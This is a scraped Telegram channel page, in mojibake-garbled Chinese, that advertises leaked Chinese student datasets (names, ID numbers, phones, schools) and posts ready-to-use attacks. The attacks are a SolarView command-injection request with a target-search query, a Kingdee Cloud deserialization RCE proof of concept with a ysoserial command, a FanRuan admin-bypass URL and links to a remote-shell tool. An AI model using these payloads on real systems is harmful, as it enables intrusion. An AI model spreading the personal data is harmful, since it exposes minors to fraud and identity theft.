๐Ÿ”ฐ้ป‘็›’-๐‘ฉ๐’๐’‚๐’„๐’Œ ๐‘ฉ๐‘ถ๐‘ฟ-่ต„ๆบๅ…ฌๅผ€๐Ÿ…ฅ๏ผˆๆ•ฐๆฎ็œ‹ๆ–‡ไปถ๏ผ‰
46.3K subscribers
46 photos
8 videos
356 files
73 links
Download Telegram
ๅนฟไธœๅญฆ็”Ÿๆ•ฐๆฎ 10Wๆก.xlsx
18.3 MB
ๅนฟไธœๅญฆ็”Ÿๆ•ฐๆฎ 10Wๆก
้ซ˜ไธญๅญฆ็”Ÿ.xlsx
12.1 MB
้ซ˜ไธญๅญฆ็”Ÿๆ•ฐๆฎ 14W+
ๅง“ๅ+ๆ€งๅˆซ+่บซไปฝ่ฏ+็”Ÿๆ—ฅ+็”ต่ฏ+ๅญฆๆ ก+็ญ็บง็ญ‰
ๅญฆ็”Ÿๆ•ฐๆฎ ๅนผ-ๅฐ-ๅˆ-้ซ˜-ไธ“-ๅคง 37W+ๆก.zip
91.5 MB
ๅญฆ็”Ÿๆ•ฐๆฎ ๅนผ-ๅฐ-ๅˆ-้ซ˜-ไธ“-ๅคง 37W+ๆก
ๅ›ฝๅ†…ๅญฆ็”Ÿๆ•ฐๆฎ.xls
1.9 MB
ๅ›ฝๅ†…ๅญฆ็”Ÿๆ•ฐๆฎ 1.3W+ๆก
ๅ†…ๅฎน๏ผšๅง“ๅ-็”ต่ฏ-่บซไปฝ่ฏ-้‚ฎ็ฎฑ-ๅญฆๆ ก
๐Ÿ‘18โค15๐Ÿฅฐ11
SolarView ๅคช้˜ณ่ƒฝๅ‘็”ตๅœบ/ ๅคช้˜ณ่ƒฝๅ‘็”ต็›‘ๆŽง็ณป็ปŸๅ‘ฝไปคๆ‰ง่กŒ

fofa.info
body="SolarView Compact" && title=="Top"

ๅ‘ฝไปค cat${IFS}/etc/passwd

POST /conf_mail.php HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded

mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M

ๅฝฑๅ“jp
GET /downloader.php?file=%3Bid%00.zip HTTP/1.1
โค4๐Ÿ‘4
้€š่ฟ‡ๅ‘ฝๅ็ฎก้“ๅ’Œ SMB ๅ่ฎฎ่ฟ›่กŒไบคไบ’ๅผ่ฟœ็จ‹ shell ่ฎฟ้—ฎ

https://github.com/DarkCoderSc/SharpShellPipe
โค2
ๅธ†่ฝฏๆŠฅ่กจ็ณป็ปŸ่Žทๅ–็ฎก็†ๅ‘˜ๆƒ้™
/ReportServer?op=fr_auth&cmd=ah_loginui&_=1619832545582
้‡‘่ถไบ‘RCEๆผๆดž poc

ๅฝฑๅ“ๅนณๅฐ
6.x --> 6.2.1012.4
7.x --> 7.0.352.16ใ€7.7.0.202111
8.x --> 8.0.0.202205ใ€8.1.0.20221110
็”Ÿๆˆๅๅบๅˆ—ๅŒ–payload๏ผš
ysoserial.exe -f BinaryFormatter -g ResourceSet -o base64 -c "ping 8d51yv.dnslog.cn"

POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc HTTP/1.1
Host: 192.168.0.110
User-Agent: Go-http-client/1.1
Content-Length: 2687
Content-Type: text/json
Accept-Encoding: gzip

{"ap0":"payload ๆ•ฐๅ€ผ","format":"3"}
๐Ÿ‘5โค1
(CVE-2023-2317) ๅŸบไบŽ Typora DOM ็š„่ทจ็ซ™็‚น่„šๆœฌๅฏผ่‡ด่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ
Typora ๆ˜ฏไธ€ๆฌพๆต่กŒ็š„่ทจๅนณๅฐ Markdown ็ผ–่พ‘ๅ™จ๏ผŒๅ…่ฎธ็”จๆˆทๅˆ›ๅปบๅ’Œ็ผ–่พ‘ๅ…ทๆœ‰ๅฎžๆ—ถ้ข„่งˆๅŠŸ่ƒฝ็š„ Markdown ๆ–‡ไปถ
https://starlabs.sg/advisories/23/23-2317/
๐Ÿ‘5โค2